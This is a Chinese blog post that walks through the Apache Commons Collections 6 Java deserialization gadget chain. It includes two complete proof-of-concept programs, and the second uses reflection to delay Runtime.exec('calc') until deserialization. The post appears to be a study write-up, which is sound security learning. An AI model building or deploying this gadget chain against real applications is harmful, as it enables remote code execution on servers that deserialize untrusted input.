CommonCollections6链分析

最新推荐文章于 2024-08-30 12:38:37 发布
最新推荐文章于 2024-08-30 12:38:37 发布
阅读量143 收藏
点赞数
分类专栏: JAVA 文章标签: 网络安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/132010346
版权
文章展示了如何通过ApacheCommonsCollections的ChainedTransformer和LazyMap创建一个恶意的反序列化链,目标是执行命令。初始尝试在put时触发了行为,通过修改LazyMap的工厂和移除特定键,成功延迟到反序列化时执行计算器命令。
摘要由CSDN通过智能技术生成

前面和CC1一样
优点是不限制jdk版本和cc的版本

先开一个ChainedTransformer
在这里插入图片描述
然后创LazyMap 我们顺便执行一下避免上面写错
在这里插入图片描述
能弹计算器 没问题
后面就是CC6不同的地方了

我们需要一个TiedMapEntry
因为需要一个类调用了get方法
TiedMapEntrygetValue()方法中调用了get() 其中mapkey都可控
在这里插入图片描述
在这里插入图片描述
那么我们就需要一个类调用getValue方法 TiedMapEntry的hashCode方法就可以
在这里插入图片描述

然后类似URLDNS的链子 我们可以知道这里可以用HashMap连上
HashMapreadObject方法会调用hashCode
在这里插入图片描述
在这里插入图片描述
至此链子结束 我们可以写出如下代码

package org.example.CC6;


import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class Main {
    public static   void main(String[] args) throws ClassNotFoundException, IOException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map,chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"xxx");
        Map map2 = new HashMap();
        map2.put(tiedMapEntry,"ccc");
        serialize(map2);
        unSerialize("ser.bin");


    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unSerialize(String path) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(path));
        return ois.readObject();
    }
}

尝试执行 发现确实能弹计算器
但是这里存在和URLDNS一样的问题 , 就是这个计算器弹的时机是在map2.put的时候
而不是我们期望的反序列化的时候

原因是HashMap在put的时候已经给整条链走完了
在这里插入图片描述
在这里插入图片描述
因为这里的key != null 所以继续进了hashCode
在这里插入图片描述
LazyMap调用get
在这里插入图片描述
然后没有key put进去了 在后面反序列化的时候就有key
key就直接return map.get(key)

为了避免这种情况 我们需要 让最开始传入的东西不能形成链子 就是说改LazyMap 改 TiedMapEntry 之类的的都行,只要不在反序列化前弹计算器就行
然后要记得给put进来的key remove掉
于是最终代码如下

package org.example.CC6;


import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class Main {
    public static   void main(String[] args) throws ClassNotFoundException, IOException, NoSuchFieldException, IllegalAccessException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "xxx");
        Map map2 = new HashMap();
        map2.put(tiedMapEntry, "ccc");
        lazyMap.remove("xxx");
        Field field = LazyMap.class.getDeclaredField("factory");
        field.setAccessible(true);
        field.set(lazyMap, chainedTransformer);

        serialize(map2);
        unSerialize("ser.bin");
    }



    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unSerialize(String path) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(path));
        return ois.readObject();
    }
}
丨Arcueid丨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(四)Common Collection 2分析
Vicl1fe的博客
05-23 542
前言 环境 jdk 1.7 Commons Collections 4.0 idea idea创建maven项目,在pom.xml添加即可 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </depen
CommonsCollections1利用链分析
m0_61506558的博客
11-14 408
总结以图解的方式回顾一下整条利用:第一条:从开始;调用 TransformedMap类从其父类继承回来的setValue()方法;然后调用了自身的方法;该方法调用传入的Transformer类的方法;
Java反序列化7-CommonsCollections6利用链分析
weixin_43263451的博客
07-30 373
利用hashSet.readobject触发hashmap.put()从而触发tiedmap.hashcode从而调用getvalue从而调用lazymap.get进而进入ChainedTransformer.tranform。ysoserial是利用hashset.readobject触发hashmap.put(),其实在hashmap.readobject中也会触发hashmap.put(),所以这里用的hashmap而不是hashset。hashset.add其实就是给其hashmap赋了个值。...
odbc 函数序列错误_Java反序列化利用链分析CommonsCollections5,6,7,9,10
weixin_39600331的博客
11-29 294
0x00 前言本文继续分析CommonsCollections:3.1的相关反序列化利用,这次主要分析CommonsCollections5,6,7,9,以及我找的一个新利用,这里暂且将其称为10.0x01 环境准备CommonsCollections5,6,7,10用的还是commons-collections:3.1,jdk用7或8都可以。CommonsCollections...
CommonCollections1 分析
arcuied
07-22 94
cc1
Commons-Collections1链分析
weixin_45682070的博客
01-04 765
条件限制: ​JDK版本:jdk1.8以前(8u71之后已修复不可利用) CC版本:Commons-Collections 3.1-3.2.1 环境搭建: <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId&g
JAVA反序列化之CommonCollections1利用
lt_xiaodou的博客
08-30 344
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用呢?通过上面的调用总结可以看出,这一套调用主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
通过Apaache Common-collections分析Java反序列化
qq_43578872的博客
09-18 155
通过Apaache Common-collections分析Java反序列化 前言 本文将通过 Apache Commons-collections爆出的反序列化漏洞来作为例子进行原理分析。 漏洞成因 在这个Java反序列化漏洞的利用主要由三个部分组成 1、可以执行恶意代码的对象(在这个例子中即为Commons-collection中的Transformer类) 2、一个被恶意对象“寄生的宿主”,通俗的来说就是,宿主对象反序列化的时候因为需要执行readObject方法,而readObject方法在可以被
Java反序列化(八)Common Collection 6分析
Vicl1fe的博客
09-26 331
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用 java.io.Objec
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8430
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 653
然后看它们之间的各种各样的依赖关系
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 905
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
需方软件供应安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
08-27 184
开源软件供应作为软件供应的一种特殊形式,该国标亦适用于指导开源软件供应中的供需双方开展组织管理和供应活动管理,增强开源软件供应组织管理和供应活动管理能力,防范供应导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应安全直接相关的内容进行识别与分析,供业内参考。
Web3开发与安全:6个月高效学习路径
最新发布
weixin_47075747的博客
08-30 498
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
【宝马中国-注册/登录安全分析报告】
08-26 1679
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 269
SaveButton 安全控件说明
钓鱼特辑(四)安全较量,摆脱“麻瓜”标签
Eaglecloud的博客
08-30 282
近期,某知名制造业企业HR又收到了来自红队“求职者”的简历,显示名为「陈梓锋-华南理工大学-硕士」的压缩文件,立马被亿格云枢EDR检测到并触发告警,企业安全团队在亿格云安全团队的介入下,及时剖析并处置了本次钓鱼攻击,经分析,本次钓鱼攻击使用了多款远控C2,规避调试器、规避内存扫描等,对抗技术丰富。另一种是在本身的shellcode内就实现了加解密。,有效应对大部分旨在规避传统安全检测的攻击,构建了一个多维度的检测与响应机制,从而为企业筑起了一道坚固的防线,抵御钓鱼攻击等网络安全威胁,保护企业数据和资产。
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 707
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
Java Collections Framework详解与实用教程
本篇教程深入探讨了Java集合框架(Java Collections Framework)的核心概念与实践,旨在为初学者和高级开发人员提供全面的学习指南。以下章节概述了教程的主要内容: 1. **教程提示**:本节提供了参加教程的适宜...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值